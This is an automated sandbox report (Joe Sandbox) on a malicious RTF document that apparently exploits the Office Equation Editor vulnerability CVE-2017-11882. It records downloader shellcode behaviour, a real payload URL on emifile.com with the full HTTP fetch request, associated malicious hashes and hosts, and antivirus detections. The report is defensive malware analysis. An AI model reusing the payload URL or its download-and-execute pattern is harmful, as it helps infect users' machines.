Analysis Report

Overview

General Information

Joe Sandbox Version:	23.0.0
Analysis ID:	71214
Start date:	06.08.2018
Start time:	20:44:02
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	LyTaZHwHpG (renamed file extension from none to rtf)
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled HDC enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.expl.winRTF@4/9@3/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 2 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Correcting counters for adjusted boot time Found Word or Excel or PowerPoint or XPS Viewer Simulate clicks Found warning dialog Click Ok Number of clicks 1 Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	80	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample HTTP request are all non existing, likely the sample is no longer working

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus detection for submitted file

Show sources

Source: LyTaZHwHpG.rtf

Avira: Label: EXP/CVE-2017-11882.A

Multi AV Scanner detection for domain / URL

Show sources

Source: http://emifile.com/frak/obai/okbimnanna.exe

virustotal: Detection: 14%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: LyTaZHwHpG.rtf	virustotal: Detection: 68%			Perma Link
Source: LyTaZHwHpG.rtf	metadefender: Detection: 37%			Perma Link

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE

Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE

Jump to behavior

Office Equation Editor has been started

Show sources

Source: unknown	Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Software Vulnerabilities:

Potential downloader shellcode found

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_006913E6 LoadLibraryA,URLDownloadToFileW,CreateProcessW,ExitProcess,

2_2_006913E6

Shellcode detected

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_006913E6 LoadLibraryA,URLDownloadToFileW,CreateProcessW,ExitProcess,

2_2_006913E6

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: emifile.com

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.2.2:49163 -> 178.128.90.174:80

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.2.2:49163 -> 178.128.90.174:80

Networking:

Domain name seen in connection with other malware

Show sources

Source: Joe Sandbox View

Domain Name: emifile.com emifile.com

Contains functionality to download and execute PE files

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_006913E6 LoadLibraryA,URLDownloadToFileW,CreateProcessW,ExitProcess,

2_2_006913E6

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic

HTTP traffic detected: GET /frak/obai/okbimnanna.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: emifile.comConnection: Keep-Alive

Contains functionality to download additional files from the internet

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_006913E6 LoadLibraryA,URLDownloadToFileW,CreateProcessW,ExitProcess,

2_2_006913E6

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word

Jump to behavior

Downloads files from webservers via HTTP

Show sources

Source: global traffic

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: emifile.com

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Aug 2018 18:44:44 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.45X-Powered-By: PHP/5.4.45Set-Cookie: PHPSESSID=pnss6f6ai8njn59f4ml35u8cd0; path=/; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: default=022d24ecdc771ed8b19a863639; path=/; httponlySet-Cookie: language=en-gb; expires=Wed, 05-Sep-2018 18:44:44 GMT; path=/; domain=emifile.comSet-Cookie: currency=MYR; expires=Wed, 05-Sep-2018 18:44:44 GMT; path=/; domain=emifile.comKeep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 62 30 63 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f

Tries to download non-existing http data (HTTP/1.1 404 Not Found)

Show sources

Source: global traffic

Urls found in memory or binary data

Show sources

Source: WINWORD.EXE, 00000001.00000002.21436071981.012E0000.00000004.sdmp	String found in binary or memory: file:///C:
Source: WINWORD.EXE, 00000001.00000002.21435221695.00394000.00000004.sdmp	String found in binary or memory: file:///C:/Users/Herb%20Blackburn/Desktop/LyTaZHwHpG.rtf
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.21013383798.0069D000.00000004.sdmp	String found in binary or memory: http://emifile.com/frak/obai/okbimnanna.exe
Source: EQNEDT32.EXE, 00000002.00000002.21013342670.0066D000.00000004.sdmp	String found in binary or memory: http://emifile.com/frak/obai/okbimnanna.exe%APPDATA%
Source: EQNEDT32.EXE, 00000002.00000002.21013383798.0069D000.00000004.sdmp	String found in binary or memory: https://fonts.gstatic.com

System Summary:

Reads the hosts file

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Classification label

Show sources

Source: classification engine

Classification label: mal80.expl.winRTF@4/9@3/1

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$TaZHwHpG.rtf

Jump to behavior

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\HERBBL~1\AppData\Local\Temp\CVR739B.tmp

Jump to behavior

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Sample is known by Antivirus

Show sources

Source: LyTaZHwHpG.rtf	virustotal: Detection: 68%
Source: LyTaZHwHpG.rtf	metadefender: Detection: 37%

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\LyTaZHwHpG.rtf
Source: unknown	Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Checks whether correct version of .NET is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades

Jump to behavior

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00672B70 push ecx; iretd	2_2_00672B72
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00672B30 push ecx; iretd	2_2_00672B32
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00672A10 push ecx; iretd	2_2_00672A12
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00672AF0 push ecx; iretd	2_2_00672AF2
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00672BD0 push ecx; iretd	2_2_00672BD2

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE

System information queried: KernelDebuggerInformation

Jump to behavior

Contains functionality to read the PEB

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_006914DC mov edx, dword ptr fs:[00000030h]

2_2_006914DC

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: WINWORD.EXE, 00000001.00000002.21435620440.00650000.00000002.sdmp, EQNEDT32.EXE, 00000004.00000002.21450139766.00670000.00000002.sdmp	Binary or memory string: Progman
Source: WINWORD.EXE, 00000001.00000002.21435620440.00650000.00000002.sdmp, EQNEDT32.EXE, 00000004.00000002.21450139766.00670000.00000002.sdmp	Binary or memory string: Program Manager
Source: WINWORD.EXE, 00000001.00000002.21435620440.00650000.00000002.sdmp, EQNEDT32.EXE, 00000004.00000002.21450139766.00670000.00000002.sdmp	Binary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious

Simulations

Behavior and APIs

Time	Type	Description
20:44:45	API Interceptor	1145x Sleep call for process: WINWORD.EXE modified
20:44:46	API Interceptor	49x Sleep call for process: EQNEDT32.EXE modified

Antivirus Detection

Initial Sample

Source	Detection	Scanner	Label	Link
LyTaZHwHpG.rtf	68%	virustotal		Browse
LyTaZHwHpG.rtf	38%	metadefender		Browse
LyTaZHwHpG.rtf	100%	Avira	EXP/CVE-2017-11882.A

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
emifile.com	4%	virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://emifile.com/frak/obai/okbimnanna.exe	15%	virustotal		Browse
http://emifile.com/frak/obai/okbimnanna.exe	0%	Avira URL Cloud	safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
emifile.com	PA78642items.doc	00d39122fd8fbeeffe16b811c5f6293ab2719b15b39b561d3ecc9857bbb57c02	malicious	Browse	202.157.177.148
	attachmen.xlsx	2012a9863ae231283c17e698d3129d5a235d79943d1c15ea9b19b5f67eccbd0d	malicious	Browse	202.157.177.148
	PO 2087441006.xlsx	47c4ed8fc69f5da1951d8753671f5d0f4535ab2d10ecf63c828b903a1e820622	malicious	Browse	202.157.177.148
	PA78642items.doc	00d39122fd8fbeeffe16b811c5f6293ab2719b15b39b561d3ecc9857bbb57c02	malicious	Browse	202.157.177.148
	emifile.com/web/chak/Salman.exe		malicious	Browse	202.157.177.148

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
FORTHNET-GRForthnetGR	BK.485799485.jse	74d71096ab1b39e13c4299e7a35a9809b0825e1f9ecd13d982a07f64092f4a7a	malicious	Browse	178.128.2.177
	https://jamiejamiename.ddns.net/o111		malicious	Browse	178.128.221.116
	https://onatou.net		malicious	Browse	178.128.185.24
	Doc-Scan.pdf	e96b3252a14ba3d296c1a1a840e775f1001b6a9ff65480158af683d8362913e6	malicious	Browse	178.128.221.116
	csrss.exe	e235d52a27a59344ccf36bb7094f5b65c0675c9f15eb52bab501d5b7ece113a5	malicious	Browse	178.128.190.53

Dropped Files

No context

Screenshots

Startup

System is w7

WINWORD.EXE (PID: 3452 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\LyTaZHwHpG.rtf MD5: 5D798FF0BE2A8970D932568068ACFD9D)

EQNEDT32.EXE (PID: 3500 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

EQNEDT32.EXE (PID: 3708 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{73DD5809-C4C1-47C5-892F-995E0EA5CAC8}.tmp
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	1024
Entropy (8bit):	0.8014421130618178
Encrypted:	false
MD5:	C291CB986CC2308C7A00A35B985C152C
SHA1:	27D1FBE505A494D112821997556C8A37C9596BD0
SHA-256:	C5211158507806194B3E1463C95CA1B04547ED27595C25CDED74B9C98B5BC33B
SHA-512:	236E2C02E37E83B11D4D024DA8CA66605978410A35C8ACB145FB085528A6405FA5F154437A8B627180619662D225C322CD9331281A7006DD66BDD25815E3DC20
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9CD81867-4ECC-4AFC-AC0B-9B1329FC83EE}.tmp
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\LyTaZHwHpG.LNK
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 6 18:44:44 2018, mtime=Mon Aug 6 18:44:44 2018, atime=Mon Aug 6 18:44:43 2018, length=9388, window=hide
Size (bytes):	2090
Entropy (8bit):	4.5958112244124525
Encrypted:	false
MD5:	BC2A2AD3FB6227B2F9815271A08EACAD
SHA1:	4F011997169E7D13747F411607AD3073082F3DEF
SHA-256:	05569E32E22B2ED552686ADDCE60BC956EE28E16D2D346BCA86BD8D55592E2B9
SHA-512:	2330B9ECAC5D976FABB053B5F1F6C8AD5109366CBE96EA889597D4FA0329CFC2019025429786F87D7343855EEE4AFCDB4546E5EC069623F2D921E7F81BAB5B7A
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	108
Entropy (8bit):	3.8714173073911313
Encrypted:	false
MD5:	8CDE36CF5638571FA37D087C6126149C
SHA1:	04B2645DA56BC6D9CE852534EBF0DB34D5CB1C4D
SHA-256:	DE81BB66D1D4AF22617A355A5C555C901BC7274F2198E86EE79B924D8F9C727A
SHA-512:	5BA773BBBA8232A1EA55922FAD0CF468F834B7F0B3E655DE09CB3F63F5277C1B8F03C830662144D4F450F5A69E1B775424BBEF3958AB6EC77B655DA5ABEA2238
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	162
Entropy (8bit):	1.982280142788856
Encrypted:	false
MD5:	FF291ADF1F74826EE3AA31EA36ADEC1C
SHA1:	9E647BCB57789C91D08C9B02D73ECD048239B5C5
SHA-256:	08B022FE12FDA6C82FEEA4C0B2736E6FF757EA90DFF28CE43E7D44CD5FB4AE36
SHA-512:	A4CCFF54304DBB44144FFF7EF0027A3DE88B66CBEE24158162D30BC8ED4E8A4D3476645E1F5B76F86BAADB18EF9867116F900B671F7951B5FCC39BABB319C5A2
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\6Z1OAB5W.txt
Process:	C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE
File Type:	ASCII text
Size (bytes):	148
Entropy (8bit):	4.515410037922913
Encrypted:	false
MD5:	FDCD8762752BE7B51EC497E20AD60E2A
SHA1:	147C334CAFF625261DE4DE7306BB19A58B2C83D4
SHA-256:	751BC9E91796BBFD9878AFB8BA545AE8AF7D23223F139CB39BE273E6DE35B2F2
SHA-512:	0E1E1B88F443166B525DCC3DED736E4BCD26BB69C612624AF6FE5F205587897E9758F575640F6D6445F8CEF92614AE5088C7674B2AB4B8274B974247122F8604
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ZHQ4QDNK.txt
Process:	C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE
File Type:	ASCII text
Size (bytes):	75
Entropy (8bit):	4.363651071172254
Encrypted:	false
MD5:	7C7C4DDC6268D5C823829D15AC9C3AB9
SHA1:	0C636ABB363AB7EB399989C3E97B434606841618
SHA-256:	5B6A705AB1DA8BBE95760B9DD45C31CA90413C30423B3A381FAEE20A0936605C
SHA-512:	9A88EB01369E982CB39AFC7684E2C1956CD0500C9AB04448027198F1D6B9EA7A360B03381FAA062777D1768C483F1760A38561F8F44FA65DE9D5A46A64A539BF
Malicious:	false
Reputation:	low

C:\Users\user\Desktop\~$TaZHwHpG.rtf
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	162
Entropy (8bit):	1.982280142788856
Encrypted:	false
MD5:	FF291ADF1F74826EE3AA31EA36ADEC1C
SHA1:	9E647BCB57789C91D08C9B02D73ECD048239B5C5
SHA-256:	08B022FE12FDA6C82FEEA4C0B2736E6FF757EA90DFF28CE43E7D44CD5FB4AE36
SHA-512:	A4CCFF54304DBB44144FFF7EF0027A3DE88B66CBEE24158162D30BC8ED4E8A4D3476645E1F5B76F86BAADB18EF9867116F900B671F7951B5FCC39BABB319C5A2
Malicious:	false
Reputation:	high, very likely benign file

\NETLOGON
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Hitachi SH big-endian COFF object, not stripped
Size (bytes):	116
Entropy (8bit):	4.053374040827533
Encrypted:	false
MD5:	EA489A9B2EB86200107B6C73309ED321
SHA1:	9995E95B9728235C65307922CDA7C3EE81C5F2C8
SHA-256:	1C29BDB043A17189A3566ED6147474D90B02ECB328469C1AC847D631B9C7D0A7
SHA-512:	B502FBDD1AF55223F26441A28FAE48579C9B17A7BB65775892806ED89ADC0900580A26C83D96756A8712C8489364C22F818C3D29792CC7EF7150DAF6F9548F3F
Malicious:	false
